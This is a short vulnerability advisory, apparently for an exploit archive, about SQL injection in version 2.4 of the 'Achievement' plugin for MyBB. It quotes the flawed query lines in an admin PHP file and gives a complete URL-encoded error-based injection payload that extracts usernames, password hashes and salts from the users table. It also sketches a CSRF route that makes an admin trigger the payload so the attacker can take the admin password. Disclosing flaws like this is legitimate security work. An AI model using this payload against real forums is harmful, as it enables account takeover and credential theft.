# Version 2.4
Introduction
------------
Achievement advanced automated system for MyBB.
SQL Injection
-------------
in admin/module/achivements/regdate.php L.265
1$query = $db->simple_select("achivements_regdate", "*", "rgid=".$mybb->input['rgid']);
Or in admin/module/achivements/regdate.php L.264
1$query = $db->simple_select("achivements_timeonline", "*", "toid=".$mybb->input['toid']);
And other
Proof of concept
----------------
It's a little tricky because the payload must be executed by the admin.
So, through a CSRF, with a payload which redirect on a php page after the request, you'll be able
to steal the admin password.
The Error based injection : http://[site]/admin/index.php?module=achivements-regdate&action=delete&rgid=1%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28select%20concat%28username,%200x3a,%20password,%200x3a,%20salt,%200x3a%29%20from%20mybb_users%20limit%201%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29--%20-
Groucho